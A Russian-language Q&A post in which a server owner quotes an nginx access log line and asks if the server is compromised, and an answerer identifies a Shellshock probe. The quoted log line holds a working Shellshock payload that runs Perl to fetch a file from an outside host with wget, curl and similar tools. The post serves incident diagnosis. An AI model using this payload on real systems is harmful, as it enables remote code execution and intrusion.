В журнале доступа nginx было довольно много записей, как показано ниже. Как мне узнать результат этих сценариев и скомпрометирован ли мой сервер?
162.232.183.48 - - [14/Jan/2016:10:54:57 +0000] "GET /cgi-bin/php4 HTTP/1.1" 200 1494 "-" "() { :;};/usr/bin/perl -e 'print \x22Content-Type: text/plain\x5Cr\x5Cn\x5Cr\x5CnXSUCCESS!\x22;system(\x22 wget http://2
04.232.209.188/images/freshcafe/slice_30_192.png ; curl -O http://204.232.209.188/images/freshcafe/slice_30_192.png ; fetch http://204.232.209.188/images/freshcafe/slice_30_192.png ; lwp-download http://204.232
.209.188/images/freshcafe/slice_30_192.png ; GET http://204.232.209.188/images/freshcafe/slice_30_192.png ; lynx http://204.232.209.188/images/freshcafe/slice_30_192.png \x22);'" "-"
Он хочет нанести удар по тебе. Самое смешное, что он неправильно сконфигурировал свою атаку. Я выполняю захват вредоносных программ, и его wget / fetch / etc терпят неудачу, потому что его пакета нет :-)
Обратите внимание на волшебную строку () { :; };. Они пытаются осмотреться и посмотреть, уязвим ли ваш сервер для ShellShock эксплойт. Perl используется здесь для печати и проверки успешности атаки.
Проверьте, уязвим ли ваш сервер для ShellShock. Если это не так, вам все ясно.
Смотрите также: Уязвим ли мой сервер для эксплойта Perl?